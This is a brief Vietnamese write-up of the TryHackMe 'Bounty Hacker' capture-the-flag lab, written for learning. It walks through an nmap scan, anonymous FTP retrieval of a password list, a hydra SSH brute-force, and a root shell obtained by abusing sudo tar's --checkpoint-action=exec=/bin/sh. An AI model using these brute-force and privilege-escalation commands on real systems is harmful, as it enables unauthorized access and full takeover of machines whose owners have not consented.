Bounty Hacker - Tryhackme

You talked a big game about being the most elite hacker in the solar system. Prove it and claim your right to the status of Elite Bounty Hacker!

 You were boasting on and on about your elite hacker skills in the bar and a few Bounty Hunters decided they'd take you up on claims! Prove your status is more than just a few glasses at the bar. I sense bell peppers & beef in your future! 

Đây là một lab pentest linux khá cơ bản nhé !!! 😏😏😊😊😊

Bước 1: Thu thập thông tin

Sử dụng lại công cụ nmap để khai thác thu thập thông tin 

nmap -sV -sC  ip_victim

Phát hiện 3 cổng hiện tại đang mở là 21,22,80

Bước 2: Khai thác thông tin thu được

Truy cập ftp để xem nội dung trong đó với quyền là anonymous

ftp ip_victim

Có 2 tệp  tin locks.txt và task.txt. Mình tải về sử dụng lệnh get để tải về

get locks.txt

get task.txt

Minh mở tệp tin này đọc mình thấy tệp locks.txt là các chuỗi giống mật khẩu còn task.txt có một đoạn code một user tên là lin

Mình vào web  của hệ thống xem có gì không 

Mình tiến hành thử broute force mật khẩu ssh xem có được không

hydra -l lin -P locks.txt ip_victim ssh -t 4

Bước 3: Kết nối và leo thang

Mình đăng nhập ssh với user và thông tin mật khẩu thu được

Đọc cờ user luôn, mình thử tìm kiếm leo thang sử dụng lệnh

sudo -l

Mình thấy có thể sử dụng lệnh tar với quyền root 

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh